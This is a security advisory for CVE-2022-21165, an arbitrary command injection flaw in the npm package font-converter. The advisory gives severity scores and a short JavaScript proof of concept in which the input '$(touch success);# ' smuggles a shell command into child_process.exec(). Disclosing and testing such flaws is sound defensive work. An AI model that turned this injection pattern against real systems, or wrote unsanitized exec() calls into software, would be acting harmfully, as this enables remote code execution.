CVE-2022-21165 – font-converter
Package
Manager: npm
Name: font-converter
Vulnerable Version: >=0 <=1.1.1
Severity
Level: Critical
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.01299 (percentile 0.78945)
Details
Font-Converter Vulnerable to Arbitrary Command Injection

### Overview

font-converter is a FontForge wrapper that allows conversion between different font formats (TTF, WOFF, OTF). All versions of this package are vulnerable to Arbitrary Command Injection due to missing sanitization of input that potentially flows into the `child_process.exec()` function.

### PoC

```js
var PUT = require('font-converter');

// Shell metacharacters in the input reach child_process.exec() unsanitized;
// the "#" comments out the remainder of the constructed command line.
var x = "$(touch success);# ";

try {
  new PUT(x, x, x, x);
} catch (e) {
  console.log(e);
}
```
Metadata
Created: 2022-08-29T20:06:54Z
Modified: 2024-04-22T23:17:12Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-g2c3-vwff-m3xr/GHSA-g2c3-vwff-m3xr.json
CWE IDs: ["CWE-77"]
Alternative ID: GHSA-g2c3-vwff-m3xr
Finding: F422
Auto approve: 1